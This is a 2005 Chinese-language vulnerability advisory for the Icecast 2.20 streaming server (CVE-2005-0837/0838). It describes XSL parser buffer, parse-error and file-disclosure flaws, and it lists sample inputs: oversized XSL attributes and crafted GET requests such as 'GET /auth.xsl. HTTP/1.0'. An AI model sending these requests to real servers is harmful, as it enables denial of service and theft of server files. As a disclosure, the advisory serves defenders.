发布日期：2005-03-21
更新日期：2005-03-21

受影响系统：

Icecast Icecast 2.20

描述：

---

BUGTRAQ  ID: 12849
CVE(CAN) ID: CVE-2005-0837,CVE-2005-0838

Icecast是一款流媒体服务器，目前支持Ogg Vorbis和MP3音频流。

IceCast的v2.20之前版本中存在多个漏洞，允许远程攻击者对服务器程序执行拒绝服务等攻击。

漏洞细节如下：

1) XSL解析器中存在一些本地未经检查的缓冲区，但应该不可利用。如果可利用的话，攻击者可能获取权限提升。

<xsl:when test="<lots of chars>"></xsl:when>
<xsl:if test="<lots of chars>"></xsl:if>
<xsl:value-of select="<lots of chars>" />

2) 导致XSL解析器错误“Could not parse XSLT file”，但这个漏洞并不实用。

GET /status.xsl> HTTP/1.0
GET /status.xsl< HTTP/1.0
GET /<status.xsl HTTP/1.0

3) XSL解析器绕过漏洞。攻击者可利用这个漏洞窃取自定义的XSL文件。

GET /auth.xsl. HTTP/1.0
GET /status.xsl. HTTP/1.0

<*来源：Patrick （patrickthomassen@gmail.com）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=111118641401753&w=2
*>

建议：

---

厂商补丁：

Icecast
-------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.icecast.org/

浏览次数：3068
严重程度：0（网友投票）